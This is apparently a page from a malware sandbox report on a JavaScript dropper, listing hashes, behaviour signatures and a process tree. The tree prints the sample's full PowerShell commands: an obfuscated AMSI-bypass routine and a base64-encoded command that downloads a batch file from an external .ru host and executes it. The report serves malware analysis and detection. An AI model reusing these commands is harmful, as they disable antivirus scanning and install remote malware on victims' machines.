Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

54678013c8...e6.pdf

windows7-x64

3

54678013c8...e6.pdf

windows10-2004-x64

3

Плате...ь.url

windows7-x64

1

Плате...ь.url

windows10-2004-x64

1

Плате...df.wsf

windows7-x64

10

Плате...df.wsf

windows10-2004-x64

10

Сопро...df.wsf

windows7-x64

10

Сопро...df.wsf

windows10-2004-x64

10

Акт_з�...19.scr

windows7-x64

10

Акт_з�...19.scr

windows10-2004-x64

10

a059d671d9...a2.exe

windows7-x64

10

a059d671d9...a2.exe

windows10-2004-x64

10

Плате...df.wsf

windows7-x64

10

Плате...df.wsf

windows10-2004-x64

10

Сопро...df.wsf

windows7-x64

10

Сопро...df.wsf

windows10-2004-x64

10

cd123c288f...f8c.js

windows7-x64

6

cd123c288f...f8c.js

windows10-2004-x64

7

d6d722ae73...21.doc

windows7-x64

10

d6d722ae73...21.doc

windows10-2004-x64

10

fdfbdd4294...44.exe

windows7-x64

10

fdfbdd4294...44.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/02/2025, 05:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js

  • Size

    10KB

  • MD5

    14b3fe437467996209704e6ebaac0f0a

  • SHA1

    76352226e921e8cf57746c551735cd913c3e45c8

  • SHA256

    cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c

  • SHA512

    a4bbc226b4e35afa37702d852325a83103570b01ed76b151ab05a1f96ff855fa12579836dea116e5a9e64bbec63606773ac49ac3b2147a2cd001f46e4d8f93de

  • SSDEEP

    192:mpu81rs1WEVHAq/azhC8bw33tDMRI7xxYG8N0vJod67czsGSVXi:mU81rW1lTyzM33du0viCczSXi

Score
7/10
defense_evasionexecution

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\apk.js"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils'; $DFiowjhOHWOHEOUF = $null; sleep 1; $text = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W1JlZl0uQXNzZW1ibHkuR2V0VHlwZSgkQ2VvaXV3am9ldXlmdykuR2V0RmllbGQoJEZFSWZ3dWlvZWhmYWl3eVlPRVRXVFJ1d3llICsgJEVGODAzNHVvd2lleXBvd2l1ZSwiTm9uUCIgKyAidWIiICsgImxpYyxTdCIgKyAiYXRpYyIpLlNldFZhbHVlKCRERmlvd2poT0hXT0hFT1VGLCR0cnVlKQ==')); iex $text; sleep 1;$BBQ = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovL3NvdXRobGFuZGVyLnJ1L2RrbGZoZ2pkZmhnamQ3OGtoZGdmamdoL2FrdC5iYXQiIC1PdXRGaWxlICIkZW52OlRFTVBcYWt0LmJhdCI7IEludm9rZS1FeHByZXNzaW9uICIkZW52OlRFTVBcYWt0LmJhdCI7')); $CCQ = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($BBQ)); Powershell -E $CCQ
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwBzAG8AdQB0AGgAbABhAG4AZABlAHIALgByAHUALwBkAGsAbABmAGgAZwBqAGQAZgBoAGcAagBkADcAOABrAGgAZABnAGYAagBnAGgALwBhAGsAdAAuAGIAYQB0ACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYQBrAHQALgBiAGEAdAAiADsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYQBrAHQALgBiAGEAdAAiADsA
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:968

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    ae343a0c544713797d1582baed41cd6c

    SHA1

    170efb0fbebe36a6f605c6cfd664525f1158a58e

    SHA256

    dbc33d6f061613aaf9ec0a3472b37ec709ac168cde70c7b48c5807765f3ed292

    SHA512

    68afed158e066e67d6526627ceda320e1702779b95b8fe597ef573c1be7bcef0dc19f0e6fc17e8103c16fb0aa77d83e06e5f64435100d60193e3ee72e9bbc8b5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_js21u5gf.m0l.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\apk.js
    Filesize

    3KB

    MD5

    a56dc65b1a1a28d7bedae072e521150d

    SHA1

    975296e54e8f05b793187048152903ec85d21868

    SHA256

    2da128f83fbae17fd5eadb31bc36be585d8b7c5982355288b58c4d8a4554254e

    SHA512

    6e04f9a0f56990e2d534a1f9bf9ececdad03182160d6236c570181d3848cd6ea838bbeeb12a53d29ba597c8634c21fdd2614b4c10f7412afd40d89bef3f155ec

    Download Submit

  • memory/2624-9-0x000001B5FEB30000-0x000001B5FEB52000-memory.dmp

    Filesize

    136KB

    Download